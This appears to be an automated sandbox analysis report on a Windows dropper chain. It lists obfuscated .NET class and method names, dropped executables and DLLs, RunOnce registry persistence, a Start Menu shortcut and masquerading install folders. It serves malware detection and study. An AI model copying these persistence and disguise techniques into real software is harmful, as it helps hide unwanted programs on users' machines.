Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, FKM5IqDU4NWxvLB6Bm/s3iLKf6lkdHu7sr0Hw.cs	High entropy of concatenated method names: '.ctor', 'Ew1bvnMrk', 'IC07fZ5WV', 'WN6W9jlrF', 'TDRDxU6MmhUveb2fJ1K', 'hptLSU6pGwQcQn2MVwj', 'vGryxH6uFZJeaB0WsVD', 'lSq1cQ6NUA8ibK3xfTI', 'hCoDR26TQecQZpG1ng9', 'OOYNTp6yXrMUaNVQdUf'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, OT1UO78FqpHfaj3LJh/eryTP8RVkcWa6d2rXG.cs	High entropy of concatenated method names: 'kL57Ufjj3HtcK', '.ctor', '.cctor', 'gdgIHrdY5PWs5SYjdso', 'SLfp5qdIMhtXf9Hk0Tk', 'J0sa79dKyL2xyJXTfIm', 'aTE94md3RAtS21jrrvS', 'HSTBtBdH5HhgFBMt9uL', 'y8UE3Md40MIyqKIF60M', 'auCyojdxQhvTNWAMX3q'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sTGpkkBje11hQTy6cd/c69XCCSa4y8kcBUEnC.cs	High entropy of concatenated method names: 'juVxjo5ug', 'sel1P3iLK', 'YlkKdHu7s', '.ctor', 'uuoF7bVznqK6AE3DQXh', 'MmglAYVOSb66i5SsOek', 'Rx3RcQV5dlQL0PjrGPw', 'PmYJqpCQhO3VvyEUYn8', 'DJynR5CVlDuIPERQwSk', 'hbZUsVCC1TZGOEKrgDg'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.tRvRu7Jr5HML52Dh2xdYFfjVXH9w6pvwvL3pHS6q/OSFilter.cs	High entropy of concatenated method names: 'checkwindows', 'Getwindows', 'checkNET', 'GetMaxValue', 'Is32Bits', 'Is64Bits', 'IsWow64Process', 'kLVusis8ZA', 'HKLM_GetString', 'EDmxU30iJ3NZTRt1KSS'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, P8QpTkVVuVjo5ugPel/HdWG1slNbM1cXiS0LZ.cs	High entropy of concatenated method names: 'nb7eSNXHQ', 'pB1vlhulg', 'dPlbTw64WbOfEZL3qBH', 'Dm38X06xgrGP5s1JnYA', 'jERXFc6YoIQXB8tK5PN', 'GYZuFe6I1MkG2x0LxrJ', 'JbjiIH6Kqh7id8x81vV', 'USJ5a263NBH65i52Jiw', 'nNvXmq6HICu0W4J19Uf', 'RXIKbv6mECX7yxnqJcj'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, gZ24ByCFdkNxhc7d1j/gVmOSbGeaNOOAGjsZw.cs	High entropy of concatenated method names: 'frIuGPSPiE', 'bnkuCtf3KS', 'T4QurUa5ws', 'FYZuheJvM4', 'yxru5ERIqA', 'OKSutH7wdH', '.ctor', 'kE3h3ULQkLb3vgJym0j', 'TNOdKbLVwXrDB44b28K', 'sHEB6QLCyNgr4xVCWUk'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sNlFPXQyH5NurCceEr/bSZRdrFKIELkMaR5PM.cs	High entropy of concatenated method names: 'U7i9tP4KF', '.ctor', 'E0yQ7766GxOXFpQhimx', 'c39cwa6b2rroanM6w08', 'Y0VoGX6sls0o3NBkvTS', 'vyd8Ho6GHsxvaTGCDBY', 'zylINY6PwGULAt6gnhy', 'nr2B4T60g0H35bHcFG9', 'NC52oJ6LbKvkdMrHbXl', 'gCCuu06AsiRiJj0a1Y2'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, u9dnx1P24QV72TnMoO/PEX9lCLevoPVSukUXf.cs	High entropy of concatenated method names: '.ctor', 'AECujemKd0', 'MiAuuQuvrg', 'K9EuXOoYCu', 'PffuSK7ef0', 'jFdi8lPLG3egGSpUGGU', 'dcLQP5PAE1aRfl3ke6M', 'C1E8F3PPg0Pq5MQB1D7', 'tafVnxP0WdTkbubQtyQ', 'v0MRITPlHOJMUy5EeEh'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, J67kXdsdFNeZKZoCLD/K6TiT10kk04NoTlJua.cs	High entropy of concatenated method names: 'm5Guxxa6Ep', 'COuu1J2LEH', '.cctor', 'AcOJVN0I8OEg6dKr9xO', 'JrkqRL0KC3cOM0mGg5Q', 'o9W4x103rESvx4drUvn', 'vSJUiv0x181lXlGcFjY', 'sXw5ie0Ys9pM32lF0pZ', 'IfDLBZ0HTtjvKxJiX2V', 'KjBnkI0mpmEQ6SR0kR9'

Persistence and Installation Behavior:

Drops executable to a common third party application directory

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File written: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe

Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\postproc-52.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-IGHFO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	File created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	File created: C:\Users\user\AppData\Local\Temp\1ffxnzir.1cn\random.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-T1381.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-9KFTG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-685QJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-CUGLT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avdevice-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-O4BO6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	File created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe	Jump to dropped file
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	File created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-3FQP6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-PVRDV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	File created: C:\Users\user\AppData\Local\Temp\nkn4qhlm.csu\autosubplayer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\swscale-2.dll (copy)	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	File created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\swresample-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avcodec-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-ESLKL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\I-Record.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-QLPAO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\AForge.Video.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-2J58U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avfilter-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avformat-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\avutil-51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	File created: C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	File created: C:\Program Files (x86)\i-record\is-L76RD.tmp	Jump to dropped file

Boot Survival:

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\i-record.lnk

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,	1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004241A4 IsIconic,SetActiveWindow,	1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	1_2_004843A8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,	1_2_0042F2F0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004175A8 IsIconic,GetCapture,	1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00417CDE IsIconic,SetWindowPos,	1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00417CE0

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

1_2_0041F128

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
